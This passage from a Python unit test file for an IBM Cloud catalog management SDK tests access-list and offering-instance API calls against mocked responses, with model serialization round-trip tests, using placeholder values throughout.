        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"errors": {"mapKey": "inner"}}'
        responses.add(responses.DELETE,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        accounts = ['testString']

        # Invoke method
        response = _service.delete_object_access_list(
            catalog_identifier,
            object_identifier,
            accounts,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params: the account list is sent as the raw JSON body.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body == accounts

    @responses.activate
    def test_delete_object_access_list_value_error(self):
        """
        test_delete_object_access_list_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"errors": {"mapKey": "inner"}}'
        responses.add(responses.DELETE,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        accounts = ['testString']

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
            "accounts": accounts,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_object_access_list(**req_copy)
class TestAddObjectAccessList():
    """
    Test Class for add_object_access_list
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_add_object_access_list_all_params(self):
        """
        add_object_access_list()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"errors": {"mapKey": "inner"}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        accounts = ['testString']

        # Invoke method
        response = _service.add_object_access_list(
            catalog_identifier,
            object_identifier,
            accounts,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params: the account list is sent as the raw JSON body.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body == accounts

    @responses.activate
    def test_add_object_access_list_value_error(self):
        """
        test_add_object_access_list_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/catalogs/testString/objects/testString/access')
        mock_response = '{"errors": {"mapKey": "inner"}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        catalog_identifier = 'testString'
        object_identifier = 'testString'
        accounts = ['testString']

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "catalog_identifier": catalog_identifier,
            "object_identifier": object_identifier,
            "accounts": accounts,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.add_object_access_list(**req_copy)
# endregion
##############################################################################
# End of Service: Objects
##############################################################################
##############################################################################
# Start of Service: Instances
##############################################################################
# region
class TestCreateOfferingInstance():
    """
    Test Class for create_offering_instance
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_create_offering_instance_all_params(self):
        """
        create_offering_instance()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Construct a dict representation of a OfferingInstanceLastOperation model
        offering_instance_last_operation_model = {}
        offering_instance_last_operation_model['operation'] = 'testString'
        offering_instance_last_operation_model['state'] = 'testString'
        offering_instance_last_operation_model['message'] = 'testString'
        offering_instance_last_operation_model['transaction_id'] = 'testString'
        offering_instance_last_operation_model['updated'] = 'testString'

        # Set up parameter values
        x_auth_refresh_token = 'testString'
        id = 'testString'
        rev = 'testString'
        # NOTE: this rebinds the local `url` used for the mock above; the mock
        # was already registered, so the shadowing is harmless here.
        url = 'testString'
        crn = 'testString'
        label = 'testString'
        catalog_id = 'testString'
        offering_id = 'testString'
        kind_format = 'testString'
        version = 'testString'
        cluster_id = 'testString'
        cluster_region = 'testString'
        cluster_namespaces = ['testString']
        cluster_all_namespaces = True
        schematics_workspace_id = 'testString'
        resource_group_id = 'testString'
        install_plan = 'testString'
        channel = 'testString'
        metadata = {}
        last_operation = offering_instance_last_operation_model

        # Invoke method
        response = _service.create_offering_instance(
            x_auth_refresh_token,
            id=id,
            rev=rev,
            url=url,
            crn=crn,
            label=label,
            catalog_id=catalog_id,
            offering_id=offering_id,
            kind_format=kind_format,
            version=version,
            cluster_id=cluster_id,
            cluster_region=cluster_region,
            cluster_namespaces=cluster_namespaces,
            cluster_all_namespaces=cluster_all_namespaces,
            schematics_workspace_id=schematics_workspace_id,
            resource_group_id=resource_group_id,
            install_plan=install_plan,
            channel=channel,
            metadata=metadata,
            last_operation=last_operation,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

        # Validate body params
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['url'] == 'testString'
        assert req_body['crn'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['catalog_id'] == 'testString'
        assert req_body['offering_id'] == 'testString'
        assert req_body['kind_format'] == 'testString'
        assert req_body['version'] == 'testString'
        assert req_body['cluster_id'] == 'testString'
        assert req_body['cluster_region'] == 'testString'
        assert req_body['cluster_namespaces'] == ['testString']
        assert req_body['cluster_all_namespaces'] == True
        assert req_body['schematics_workspace_id'] == 'testString'
        assert req_body['resource_group_id'] == 'testString'
        assert req_body['install_plan'] == 'testString'
        assert req_body['channel'] == 'testString'
        assert req_body['metadata'] == {}
        assert req_body['last_operation'] == offering_instance_last_operation_model

    @responses.activate
    def test_create_offering_instance_required_params(self):
        """
        test_create_offering_instance_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.create_offering_instance(
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 201

    @responses.activate
    def test_create_offering_instance_value_error(self):
        """
        test_create_offering_instance_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.POST,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=201)

        # Set up parameter values
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.create_offering_instance(**req_copy)
class TestGetOfferingInstance():
    """
    Test Class for get_offering_instance
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, register it as a regex so the
        # mock matches regardless of trailing-slash normalization by the client.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_get_offering_instance_all_params(self):
        """
        get_offering_instance()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'

        # Invoke method
        response = _service.get_offering_instance(
            instance_identifier,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_get_offering_instance_value_error(self):
        """
        test_get_offering_instance_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.GET,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'

        # Pass in all but one required param and check for a ValueError
        req_param_dict = {
            "instance_identifier": instance_identifier,
        }
        for param in req_param_dict.keys():
            # Compare by equality, not identity (was `key is not param`).
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.get_offering_instance(**req_copy)
class TestPutOfferingInstance():
    """
    Test Class for put_offering_instance
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, return a regex that
        # tolerates any number of trailing slashes; otherwise use it as-is.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_put_offering_instance_all_params(self):
        """
        put_offering_instance()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Construct a dict representation of a OfferingInstanceLastOperation model
        offering_instance_last_operation_model = {}
        offering_instance_last_operation_model['operation'] = 'testString'
        offering_instance_last_operation_model['state'] = 'testString'
        offering_instance_last_operation_model['message'] = 'testString'
        offering_instance_last_operation_model['transaction_id'] = 'testString'
        offering_instance_last_operation_model['updated'] = 'testString'

        # Set up parameter values
        instance_identifier = 'testString'
        x_auth_refresh_token = 'testString'
        id = 'testString'
        rev = 'testString'
        url = 'testString'
        crn = 'testString'
        label = 'testString'
        catalog_id = 'testString'
        offering_id = 'testString'
        kind_format = 'testString'
        version = 'testString'
        cluster_id = 'testString'
        cluster_region = 'testString'
        cluster_namespaces = ['testString']
        cluster_all_namespaces = True
        schematics_workspace_id = 'testString'
        resource_group_id = 'testString'
        install_plan = 'testString'
        channel = 'testString'
        metadata = {}
        last_operation = offering_instance_last_operation_model

        # Invoke method
        response = _service.put_offering_instance(
            instance_identifier,
            x_auth_refresh_token,
            id=id,
            rev=rev,
            url=url,
            crn=crn,
            label=label,
            catalog_id=catalog_id,
            offering_id=offering_id,
            kind_format=kind_format,
            version=version,
            cluster_id=cluster_id,
            cluster_region=cluster_region,
            cluster_namespaces=cluster_namespaces,
            cluster_all_namespaces=cluster_all_namespaces,
            schematics_workspace_id=schematics_workspace_id,
            resource_group_id=resource_group_id,
            install_plan=install_plan,
            channel=channel,
            metadata=metadata,
            last_operation=last_operation,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

        # Validate body params: every optional field must round-trip into
        # the serialized PUT request body.
        req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
        assert req_body['id'] == 'testString'
        assert req_body['_rev'] == 'testString'
        assert req_body['url'] == 'testString'
        assert req_body['crn'] == 'testString'
        assert req_body['label'] == 'testString'
        assert req_body['catalog_id'] == 'testString'
        assert req_body['offering_id'] == 'testString'
        assert req_body['kind_format'] == 'testString'
        assert req_body['version'] == 'testString'
        assert req_body['cluster_id'] == 'testString'
        assert req_body['cluster_region'] == 'testString'
        assert req_body['cluster_namespaces'] == ['testString']
        assert req_body['cluster_all_namespaces'] == True
        assert req_body['schematics_workspace_id'] == 'testString'
        assert req_body['resource_group_id'] == 'testString'
        assert req_body['install_plan'] == 'testString'
        assert req_body['channel'] == 'testString'
        assert req_body['metadata'] == {}
        assert req_body['last_operation'] == offering_instance_last_operation_model

    @responses.activate
    def test_put_offering_instance_required_params(self):
        """
        test_put_offering_instance_required_params()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method with only the required parameters
        response = _service.put_offering_instance(
            instance_identifier,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_put_offering_instance_value_error(self):
        """
        test_put_offering_instance_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
        responses.add(responses.PUT,
                      url,
                      body=mock_response,
                      content_type='application/json',
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError.
        # NOTE: use `!=` (value equality), not `is not` (identity) — string
        # identity comparisons only work by accident of CPython interning.
        req_param_dict = {
            "instance_identifier": instance_identifier,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.put_offering_instance(**req_copy)
class TestDeleteOfferingInstance():
    """
    Test Class for delete_offering_instance
    """

    def preprocess_url(self, request_url: str):
        """
        Preprocess the request URL to ensure the mock response will be found.
        """
        # If the URL ends in one or more slashes, return a regex that
        # tolerates any number of trailing slashes; otherwise use it as-is.
        if re.fullmatch('.*/+', request_url) is None:
            return request_url
        else:
            return re.compile(request_url.rstrip('/') + '/+')

    @responses.activate
    def test_delete_offering_instance_all_params(self):
        """
        delete_offering_instance()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'
        x_auth_refresh_token = 'testString'

        # Invoke method
        response = _service.delete_offering_instance(
            instance_identifier,
            x_auth_refresh_token,
            headers={}
        )

        # Check for correct operation
        assert len(responses.calls) == 1
        assert response.status_code == 200

    @responses.activate
    def test_delete_offering_instance_value_error(self):
        """
        test_delete_offering_instance_value_error()
        """
        # Set up mock
        url = self.preprocess_url(_base_url + '/instances/offerings/testString')
        responses.add(responses.DELETE,
                      url,
                      status=200)

        # Set up parameter values
        instance_identifier = 'testString'
        x_auth_refresh_token = 'testString'

        # Pass in all but one required param and check for a ValueError.
        # NOTE: use `!=` (value equality), not `is not` (identity) — string
        # identity comparisons only work by accident of CPython interning.
        req_param_dict = {
            "instance_identifier": instance_identifier,
            "x_auth_refresh_token": x_auth_refresh_token,
        }
        for param in req_param_dict.keys():
            req_copy = {key: val if key != param else None for (key, val) in req_param_dict.items()}
            with pytest.raises(ValueError):
                _service.delete_offering_instance(**req_copy)
# endregion
##############################################################################
# End of Service: Instances
##############################################################################
##############################################################################
# Start of Model Tests
##############################################################################
# region
class TestModel_AccessListBulkResponse():
    """
    Test Class for AccessListBulkResponse
    """

    def test_access_list_bulk_response_serialization(self):
        """
        Round-trip an AccessListBulkResponse through dict -> model -> dict.
        """
        # Source dict to deserialize from.
        source_json = {'errors': {}}

        # dict -> model
        model = AccessListBulkResponse.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        attrs = AccessListBulkResponse.from_dict(source_json).__dict__
        rebuilt = AccessListBulkResponse(**attrs)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_Account():
    """
    Test Class for Account
    """

    def test_account_serialization(self):
        """
        Round-trip an Account through dict -> model -> dict.
        """
        # Nested model dicts needed to build the Account payload.
        filter_terms_model = {'filter_terms': ['testString']}
        category_filter_model = {'include': True, 'filter': filter_terms_model}
        id_filter_model = {'include': filter_terms_model, 'exclude': filter_terms_model}
        filters_model = {
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }

        # Source dict to deserialize from.
        source_json = {
            'id': 'testString',
            'hide_IBM_cloud_catalog': True,
            'account_filters': filters_model,
        }

        # dict -> model
        model = Account.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = Account(**Account.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_AccumulatedFilters():
    """
    Test Class for AccumulatedFilters
    """

    def test_accumulated_filters_serialization(self):
        """
        Round-trip an AccumulatedFilters through dict -> model -> dict.
        """
        # Nested model dicts needed to build the payload.
        filter_terms_model = {'filter_terms': ['testString']}
        category_filter_model = {'include': True, 'filter': filter_terms_model}
        id_filter_model = {'include': filter_terms_model, 'exclude': filter_terms_model}
        filters_model = {
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }
        catalog_ref = {'id': 'testString', 'name': 'testString'}
        catalog_filters_item = {'catalog': catalog_ref, 'filters': filters_model}

        # Source dict to deserialize from.
        source_json = {
            'account_filters': [filters_model],
            'catalog_filters': [catalog_filters_item],
        }

        # dict -> model
        model = AccumulatedFilters.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = AccumulatedFilters(**AccumulatedFilters.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_AccumulatedFiltersCatalogFiltersItem():
    """
    Test Class for AccumulatedFiltersCatalogFiltersItem
    """

    def test_accumulated_filters_catalog_filters_item_serialization(self):
        """
        Round-trip an AccumulatedFiltersCatalogFiltersItem through
        dict -> model -> dict.
        """
        # Nested model dicts needed to build the payload.
        catalog_ref = {'id': 'testString', 'name': 'testString'}
        filter_terms_model = {'filter_terms': ['testString']}
        category_filter_model = {'include': True, 'filter': filter_terms_model}
        id_filter_model = {'include': filter_terms_model, 'exclude': filter_terms_model}
        filters_model = {
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }

        # Source dict to deserialize from.
        source_json = {'catalog': catalog_ref, 'filters': filters_model}

        # dict -> model
        model = AccumulatedFiltersCatalogFiltersItem.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = AccumulatedFiltersCatalogFiltersItem(
            **AccumulatedFiltersCatalogFiltersItem.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_AccumulatedFiltersCatalogFiltersItemCatalog():
    """
    Test Class for AccumulatedFiltersCatalogFiltersItemCatalog
    """

    def test_accumulated_filters_catalog_filters_item_catalog_serialization(self):
        """
        Round-trip an AccumulatedFiltersCatalogFiltersItemCatalog through
        dict -> model -> dict.
        """
        # Source dict to deserialize from.
        source_json = {'id': 'testString', 'name': 'testString'}

        # dict -> model
        model = AccumulatedFiltersCatalogFiltersItemCatalog.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = AccumulatedFiltersCatalogFiltersItemCatalog(
            **AccumulatedFiltersCatalogFiltersItemCatalog.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_ApprovalResult():
    """
    Test Class for ApprovalResult
    """

    def test_approval_result_serialization(self):
        """
        Round-trip an ApprovalResult through dict -> model -> dict.
        """
        # Source dict to deserialize from.
        source_json = {
            'allow_request': True,
            'ibm': True,
            'public': True,
            'changed': True,
        }

        # dict -> model
        model = ApprovalResult.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = ApprovalResult(**ApprovalResult.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_AuditLog():
    """
    Test Class for AuditLog
    """

    def test_audit_log_serialization(self):
        """
        Round-trip an AuditLog through dict -> model -> dict.
        """
        # Nested AuditRecord dict needed to build the payload.
        audit_record_model = {
            'id': 'testString',
            'created': "2019-01-01T12:00:00Z",
            'change_type': 'testString',
            'target_type': 'testString',
            'target_id': 'testString',
            'who_delegate_email': 'testString',
            'message': 'testString',
        }

        # Source dict to deserialize from.
        source_json = {'list': [audit_record_model]}

        # dict -> model
        model = AuditLog.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = AuditLog(**AuditLog.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_AuditRecord():
    """
    Test Class for AuditRecord
    """

    def test_audit_record_serialization(self):
        """
        Round-trip an AuditRecord through dict -> model -> dict.
        """
        # Source dict to deserialize from.
        source_json = {
            'id': 'testString',
            'created': "2019-01-01T12:00:00Z",
            'change_type': 'testString',
            'target_type': 'testString',
            'target_id': 'testString',
            'who_delegate_email': 'testString',
            'message': 'testString',
        }

        # dict -> model
        model = AuditRecord.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = AuditRecord(**AuditRecord.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_Catalog():
    """
    Test Class for Catalog
    """

    def test_catalog_serialization(self):
        """
        Round-trip a Catalog through dict -> model -> dict.
        """
        # Nested model dicts needed to build the Catalog payload.
        feature_model = {'title': 'testString', 'description': 'testString'}
        filter_terms_model = {'filter_terms': ['testString']}
        category_filter_model = {'include': True, 'filter': filter_terms_model}
        id_filter_model = {'include': filter_terms_model, 'exclude': filter_terms_model}
        filters_model = {
            'include_all': True,
            'category_filters': {},
            'id_filters': id_filter_model,
        }
        syndication_cluster_model = {
            'region': 'testString',
            'id': 'testString',
            'name': 'testString',
            'resource_group_name': 'testString',
            'type': 'testString',
            'namespaces': ['testString'],
            'all_namespaces': True,
        }
        syndication_history_model = {
            'namespaces': ['testString'],
            'clusters': [syndication_cluster_model],
            'last_run': "2019-01-01T12:00:00Z",
        }
        syndication_authorization_model = {
            'token': 'testString',
            'last_run': "2019-01-01T12:00:00Z",
        }
        syndication_resource_model = {
            'remove_related_components': True,
            'clusters': [syndication_cluster_model],
            'history': syndication_history_model,
            'authorization': syndication_authorization_model,
        }

        # Source dict to deserialize from.
        source_json = {
            'id': 'testString',
            '_rev': 'testString',
            'label': 'testString',
            'short_description': 'testString',
            'catalog_icon_url': 'testString',
            'tags': ['testString'],
            'url': 'testString',
            'crn': 'testString',
            'offerings_url': 'testString',
            'features': [feature_model],
            'disabled': True,
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'resource_group_id': 'testString',
            'owning_account': 'testString',
            'catalog_filters': filters_model,
            'syndication_settings': syndication_resource_model,
            'kind': 'testString',
        }

        # dict -> model
        model = Catalog.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = Catalog(**Catalog.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_CatalogObject():
    """
    Test Class for CatalogObject
    """

    def test_catalog_object_serialization(self):
        """
        Round-trip a CatalogObject through dict -> model -> dict.
        """
        # Nested model dicts needed to build the payload.
        publish_object_model = {
            'permit_ibm_public_publish': True,
            'ibm_approved': True,
            'public_approved': True,
            'portal_approval_record': 'testString',
            'portal_url': 'testString',
        }
        state_model = {
            'current': 'testString',
            'current_entered': "2019-01-01T12:00:00Z",
            'pending': 'testString',
            'pending_requested': "2019-01-01T12:00:00Z",
            'previous': 'testString',
        }

        # Source dict to deserialize from.
        source_json = {
            'id': 'testString',
            'name': 'testString',
            '_rev': 'testString',
            'crn': 'testString',
            'url': 'testString',
            'parent_id': 'testString',
            'label_i18n': 'testString',
            'label': 'testString',
            'tags': ['testString'],
            'created': "2019-01-01T12:00:00Z",
            'updated': "2019-01-01T12:00:00Z",
            'short_description': 'testString',
            'short_description_i18n': 'testString',
            'kind': 'testString',
            'publish': publish_object_model,
            'state': state_model,
            'catalog_id': 'testString',
            'catalog_name': 'testString',
            'data': {},
        }

        # dict -> model
        model = CatalogObject.from_dict(source_json)
        assert model != False

        # Rebuild a second instance from the first one's attribute dict and
        # verify the two instances compare equal.
        rebuilt = CatalogObject(**CatalogObject.from_dict(source_json).__dict__)
        assert model == rebuilt

        # model -> dict must reproduce the original input exactly.
        assert model.to_dict() == source_json
class TestModel_CatalogSearchResult():
    """
    Test Class for CatalogSearchResult
    """

    def test_catalog_search_result_serialization(self):
        """
        Test serialization/deserialization for CatalogSearchResult
        """
        # Dict forms of the nested models embedded in a Catalog resource.
        feature_model = {  # Feature
            'title': 'testString',
            'description': 'testString',
        }
        filter_terms_model = {'filter_terms': ['testString']}  # FilterTerms
